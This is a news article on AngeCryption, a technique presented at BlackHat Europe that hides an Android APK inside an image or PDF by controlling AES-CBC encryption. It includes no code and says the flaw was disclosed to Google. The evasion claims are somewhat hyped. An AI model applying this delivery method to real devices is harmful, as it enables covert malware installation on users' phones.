Android malware distribution through PDF or Image
Two security researchers from Fortinet, Axelle Apvrille and Ange Albertini have created a technique that allows them control over the input and the output of AES CBC encryption process. Further exploitation of this unique control of the input/output of AES CBC encryption process can be used to create a custom tool through which a input appearing as a PNG/JPG image or an Adobe document (PDF) to a normal user, can be decrypted to carry malicious payload aka malware.
The technique developed by Apvrille and Ange is so perfect that it can easily escape any malware scanning solution available in the market on Android OS.
The researchers have named the creation as AngeCryption as it was conceived and created by Ange.
AngeCryption proves that any input can be encrypted into a valid output (supported formats are PNG, JPG, PDF, and FLV) which looks normal to users. The output part is a exact replica of an Android application package (APK) and can deliver anything the authors wish to deliver to the targeted device.
AngeCryption has been made available as a Python script and you can visit Google Code.
The AngeCryption can be used to hide a Android application Package (APK) containing deadly malware and deliver it to the normal user as a valid image or a PDF file. The AngeCryption is very deadly as it can deliver almost any payload to any Android version including the current Android KitKat 4.4.
AngeCryption was presented to the audience during the recently held BlackHat Europe in Amsterdam last week. In their demonstration, the researchers encrypted an image of Star Wars character Anakin Skywalker using the AES algorithm in cipher block chaining (CBC) mode. The researchers said that 3DES can also be employed with the same success.
By manipulating the output of encryption bytes with AngeCryption, another picture selected by the duo would become available upon decryption, that of Darth Vader, which could be substituted by any other file (malicious APK for instance).
Once the input and output files are distinguished and malware fed into the Image or PDF, a simple hack attack can complete the process of infiltrating the user;s smartphone or tablet. However only packing the malware into image wont work as per the researchers. For the malware to be executed on the victims device some data needs to be appended at the end of the original package, after a signature (end-of-central-directory – EOCD) marking the end of the compressed file.
The reason for appending data is that APK is basically a ZIP archive and it does not permit any data to be added beyond the EOCD.
An App created using the present version of AngeCryption will generate permission requests while installation. These permission requests can reveal to a more geeky user about the secondary APK being deployed under the shadow of the first one.
However this problem can be easily overcome by many procedure, one of them being DexClassLoader.
Proof of Concept (PoC)
The researchers have already sent a proof-of-concept demonstrating this type of attack, to the Android security team on May 27, 2014. They said that Google will fix the issue in the future update of Android OS. Whether this issue has been fixed in the newly launched Android 5.0 Lollipop is not known.
You can read the entire presentation by Axelle Apvrille and Ange Albertini here (PDF)